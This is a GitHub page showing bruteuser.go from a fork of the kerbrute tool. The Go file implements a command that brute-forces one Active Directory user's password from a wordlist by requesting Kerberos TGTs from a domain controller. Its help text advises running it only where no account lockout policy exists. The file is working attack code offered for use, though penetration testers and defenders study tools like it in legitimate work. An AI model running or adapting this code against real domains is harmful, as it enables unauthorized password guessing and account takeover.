forked from ropnop/kerbrute
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathbruteuser.go
90 lines (75 loc) · 2.11 KB
/
bruteuser.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
package cmd
import (
"bufio"
"os"
"sync"
"sync/atomic"
"time"
"github.com/ropnop/kerbrute/util"
"github.com/spf13/cobra"
)
// bruteuserCmd represents the bruteuser command
var bruteuserCmd = &cobra.Command{
Use: "bruteuser [flags] <password_list> username",
Short: "Bruteforce a single user's password from a wordlist",
Long: `Will perform a password bruteforce against a single domain user using Kerberos Pre-Authentication by requesting at TGT from the KDC.
If no domain controller is specified, the tool will attempt to look one up via DNS SRV records.
A full domain is required. This domain will be capitalized and used as the Kerberos realm when attempting the bruteforce.
WARNING: only run this if there's no lockout policy!`,
Args: cobra.ExactArgs(2),
PreRun: setupSession,
Run: bruteForceUser,
}
func init() {
rootCmd.AddCommand(bruteuserCmd)
}
func bruteForceUser(cmd *cobra.Command, args []string) {
passwordlist := args[0]
stopOnSuccess = true
kSession.SafeMode = true
username, err := util.FormatUsername(args[1])
if err != nil {
logger.Log.Error(err.Error())
return
}
passwordsChan := make(chan string, threads)
defer cancel()
var wg sync.WaitGroup
wg.Add(threads)
var scanner *bufio.Scanner
if passwordlist != "-" {
file, err := os.Open(passwordlist)
if err != nil {
logger.Log.Error(err.Error())
return
}
defer file.Close()
scanner = bufio.NewScanner(file)
} else {
scanner = bufio.NewScanner(os.Stdin)
}
for i := 0; i < threads; i++ {
go makeBruteWorker(ctx, passwordsChan, &wg, username)
}
start := time.Now()
var password string
Scan:
for scanner.Scan() {
select {
case <-ctx.Done():
break Scan
default:
password = scanner.Text()
time.Sleep(time.Duration(delay) * time.Millisecond)
passwordsChan <- password
}
}
close(passwordsChan)
wg.Wait()
finalCount := atomic.LoadInt32(&counter)
finalSuccess := atomic.LoadInt32(&successes)
logger.Log.Infof("Done! Tested %d logins (%d successes) in %.3f seconds", finalCount, finalSuccess, time.Since(start).Seconds())
if err := scanner.Err(); err != nil {
logger.Log.Error(err.Error())
}
}